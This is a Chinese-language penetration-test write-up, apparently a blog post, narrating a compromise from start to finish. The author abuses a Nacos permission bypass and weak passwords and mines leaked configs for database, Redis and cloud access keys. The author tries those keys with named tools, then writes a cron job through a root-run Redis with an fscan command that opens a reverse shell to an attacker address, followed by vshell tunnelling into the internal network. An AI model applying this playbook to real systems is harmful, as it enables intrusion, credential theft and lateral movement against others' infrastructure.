经典c段打点开局。使用dddd做快速的打点发现某系统存在nacos权限绕过

有点怀疑是蜜罐，毕竟nacos这实在是有点经典

nacos利用

老规矩见面先上nacos利用工具打一波看看什么情况

弱口令nacos以及未授权访问，看这记录估计被光顾挺多次了啊

手动利用Nacos-Client Yaml 反序列化漏洞失败了，只能摸一摸nacos系统里面有没有什么信息

nacos的打法一般就是看有没有配置信息泄露和自身的一些反序列化漏洞

我这里上面一行有4个都可以去点开看看里面的列的内容，然后配置信息一般就是点开详情就可以查看

运气非常好

找到了数据库的链接账号和密码

redis的密码

微信和wb的一些配置信息？微信小程序的我倒是遇到过，wb的还是第一次见，在网上也没有找打利用方式

惊喜有阿里云的ak和sk！！！

基本就是这些，收获有点过多了

阿里云aksk利用

先尝试利用一下ak和sk，使用阿里云tools

查询后什么都没有查到，估计是失效了，我就说哪有这么好的情况，用ossbrowser尝试后也是没有意外的失效了。

mysql数据库利用

转头查看一下账号密码看能不能连接一下数据库

重新对服务器进行一下扫描

数据库竟然全部开启了对外连接

优先使用mysql连接一下

使用工具MTDU

尝试进行利用

发现错误提示无法写入文件

那么直接用navicat连接一下，数据库的信息还是挺多的，然后检测了一下发现没有目录的写入权限，后续像看看系统能不能写日志文件包含，然后修改日志的保存地址也是失败了。只能在数据库中翻一番有没有什么信息或者密码啥的

功夫不负有心人竟然在数据库中翻到了7牛云的ak和sk，然后就真没翻到其他的东西了，另外没有看到什么没加密的密码以及加了密也没有破解出来的密码和三要素的信息。。。

7牛云aksk利用

我也是第一次遇到7牛云的aksk泄露，在网上找了一下看看利用方式

有一个工具利用

https://github.com/12qwertyuiop/qvmtool

使用方式也很简单，先-s设置一下aksk然后-l就可以了

结果利用失败了，看报错应该是没有返回信息，也就是没利用成功

有点难受，我觉得是工具的原因，于是去官网又找到了另一个连接工具kodo

图形化工具 Kodo Browser_实用工具_对象存储 - 七牛开发者中心

结果也是失败了，看来也是失效了。。。

3306打完了还剩下一个redis也是利用的这个账号密码

redis利用

MDTU虽然也有redis模块但是我觉得他那个模块有点问题，我使用的时候使用失败了，于是直接用fscan的尝试利用算了

参数

-rf写公钥，-rs写计划任务

先扫一下看能不能写redis，毕竟以root权限来启动redis的还是很少的

./fscan_linux -h ip地址 -p 6379 -pwd 密码

出来了，可以写定时任务和公钥，看来是root权限启动的而且是centos的系统，因为只有centos的系统才可以写计划任务

redis手动利用我之前也写过相关的文章

护网HW面试——redis利用方式即复现_redis复现-CSDN博客

我这里直接写计划任务反弹shell上线了

./fscan_linux -h ip地址 -p 6379 -pwd 密码 -rs 攻击机地址:监听端口

等待一会计划任务的执行直接反弹上线，而且直接就是root权限

舒服了，后续也是直接上线vshell然后打隧道建代理打内网，用vshell打隧道简直不要太舒服，一键直接打好，感觉和nps一样而且比nps方便，不需要还自己把客户端上传去执行

后记：

         经典的nacos的利用方式，运气好遇到个root权限起的redis服务，还是挺有意思的，毕竟之前只在公众号文章中看到这些打法，实际遇到了还是花了挺多时间的。